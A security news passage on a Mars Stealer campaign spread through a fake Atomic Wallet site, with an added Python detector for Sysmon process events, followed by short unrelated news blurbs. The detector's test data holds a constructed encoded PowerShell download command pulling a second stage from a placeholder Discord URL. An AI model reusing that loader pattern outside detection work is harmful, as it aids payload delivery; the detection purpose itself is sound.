Threat actors have been distributing the Mars Stealer info-stealing malware through a phony website spoofing the widely-used decentralized wallet and cryptocurrency exchange portal Atomic Wallet, reports BleepingComputer.
Detection evasion measures have been implemented in the ongoing Mars Stealer campaign, which involves a ZIP file containing the AtomicWallet-Setup.bat batch file that prompts for privilege escalation through a PowerShell command, a report from Cyble showed. The PowerShell executable is then copied, renamed, and hidden in the directory before base64-encoded PowerShell content is executed.
Researchers also found that the final PowerShell code serving as the malware loader facilitates the download of a Mars Stealer copy from a Discord server before deployment on targeted machines.
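As an added example (not code from the Cyble report or from BleepingComputer), the following Python scores Sysmon-style process-creation records against the behaviours described above: the batch-file launcher, the copied and renamed PowerShell binary (caught through the OriginalFileName field, which a plain copy-and-rename does not change), the base64-encoded -EncodedCommand payload (decoded as UTF-16LE, which is what PowerShell expects) and a download from a Discord host. The events, the payload and the Discord URL are constructed samples, not indicators from the report; field names follow Sysmon Event ID 1.

```python
import base64
import re

# Indicators drawn from the text: a batch launcher, a copied/renamed PowerShell
# binary, a base64-encoded PowerShell payload, and a download from Discord.
# The Discord host below is an assumption for the constructed sample, not an
# indicator taken from the report.
DOWNLOAD_RE = re.compile(
    r"Invoke-WebRequest|DownloadString|DownloadFile|Start-BitsTransfer|\bcurl\b|\bwget\b",
    re.I,
)
DISCORD_RE = re.compile(r"https?://[^\s'\"]*discord(?:app)?\.com/", re.I)
# PowerShell accepts any unambiguous prefix of -EncodedCommand (-e, -ec, -enc, ...).
ENC_SWITCH_RE = re.compile(r"(?:^|\s)[-/](e[a-z]*)\s+([A-Za-z0-9+/=]{8,})", re.I)


def decode_encoded_command(cmdline: str):
    """Return the decoded script if the command line carries -EncodedCommand, else None."""
    for m in ENC_SWITCH_RE.finditer(cmdline):
        switch, blob = m.group(1).lower(), m.group(2)
        if not "encodedcommand".startswith(switch):
            continue  # e.g. -ExecutionPolicy: starts with 'e' but is a different switch
        try:
            # -EncodedCommand takes base64 of the UTF-16LE script text.
            return base64.b64decode(blob, validate=True).decode("utf-16le")
        except (ValueError, UnicodeDecodeError):
            return None
    return None


def basename(path: str) -> str:
    return path.replace("/", "\\").rsplit("\\", 1)[-1].lower()


def analyze_event(ev: dict) -> list:
    """Sysmon-style process-creation record -> list of finding tags (empty when benign)."""
    findings = []
    image = basename(ev.get("Image", ""))
    if re.search(r"\.bat\b", ev.get("ParentCommandLine", ""), re.I):
        findings.append("batch_launcher")
    # A copied/renamed powershell.exe keeps PowerShell.EXE in its version
    # resource, which Sysmon surfaces as OriginalFileName.
    if ev.get("OriginalFileName", "").lower() == "powershell.exe" and image != "powershell.exe":
        findings.append("renamed_powershell")
    decoded = decode_encoded_command(ev.get("CommandLine", ""))
    if decoded is not None:
        findings.append("encoded_command")  # also used legitimately; weigh by content
        if DOWNLOAD_RE.search(decoded):
            findings.append("download_cradle")
        if DISCORD_RE.search(decoded):
            findings.append("discord_url")
    return findings


def scan_events(events):
    """Return (index, findings) for every event that produced at least one finding."""
    return [(i, f) for i, ev in enumerate(events) if (f := analyze_event(ev))]


# Constructed sample payload and events (hypothetical; not captured from the campaign).
SAMPLE_SCRIPT = (
    "Invoke-WebRequest -Uri 'https://cdn.discordapp.com/attachments/EXAMPLE/stage2.bin' "
    "-OutFile $env:TEMP\\stage2.bin"
)
SAMPLE_B64 = base64.b64encode(SAMPLE_SCRIPT.encode("utf-16le")).decode()
SAMPLE_EVENTS = [
    {   # 0: benign interactive PowerShell session
        "Image": r"C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe",
        "OriginalFileName": "PowerShell.EXE",
        "ParentImage": r"C:\Windows\explorer.exe",
        "ParentCommandLine": "explorer.exe",
        "CommandLine": "powershell.exe -NoProfile -ExecutionPolicy Bypass -Command Get-Process",
    },
    {   # 1: renamed copy of powershell.exe, launched by the batch file, encoded payload
        "Image": r"C:\Users\victim\AppData\Local\Temp\AtomicWallet\svc.exe",
        "OriginalFileName": "PowerShell.EXE",
        "ParentImage": r"C:\Windows\System32\cmd.exe",
        "ParentCommandLine": r'cmd.exe /c "C:\Users\victim\Downloads\AtomicWallet-Setup.bat"',
        "CommandLine": f"svc.exe -NoProfile -enc {SAMPLE_B64}",
    },
    {   # 2: an administrator running an encoded but harmless command
        "Image": r"C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe",
        "OriginalFileName": "PowerShell.EXE",
        "ParentImage": r"C:\Windows\System32\cmd.exe",
        "ParentCommandLine": "cmd.exe",
        "CommandLine": "powershell.exe -EncodedCommand "
        + base64.b64encode("Get-Date".encode("utf-16le")).decode(),
    },
]

if __name__ == "__main__":
    for idx, tags in scan_events(SAMPLE_EVENTS):
        print(idx, SAMPLE_EVENTS[idx]["Image"], tags)
```

The OriginalFileName comparison catches the copy-and-rename step the report describes but not a binary whose version resource has been edited, so it complements rather than replaces a hash or signer check. Encoded commands on their own are common in legitimate administration, which is why the tag is only raised to a download or Discord finding after the payload has been decoded.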
While the fake website was not an accurate replication of the legitimate Atomic Wallet site, its usage of official logos, marketing images, themes, and structure, as well as a contact form, FAQ section, and email address may deceive individuals who are unaware of the real site, according to the report.
This week, Dr. Doug raves about: 'The Orgy of the Walking Dead' or Elon is controlling my brain, Schoolyard Bully, Redigo, DuckLogs, DoD Alphabet soup, Sirius XM, Pixel Tracking, TSA, Single Sign-on rants, and more on the Security Weekly News!
Novel DuckLogs malware-as-a-service detailed
More than 6,000 victims have been compromised by the new DuckLogs malware-as-a-service operation, whose platform is being leveraged by over 2,000 cybercriminals, according to BleepingComputer.
BleepingComputer reports that Redis servers that remain unpatched to CVE-2022-0543 are being compromised with the novel Go-based Redigo malware, which is not yet detected on VirusTotal antivirus engines.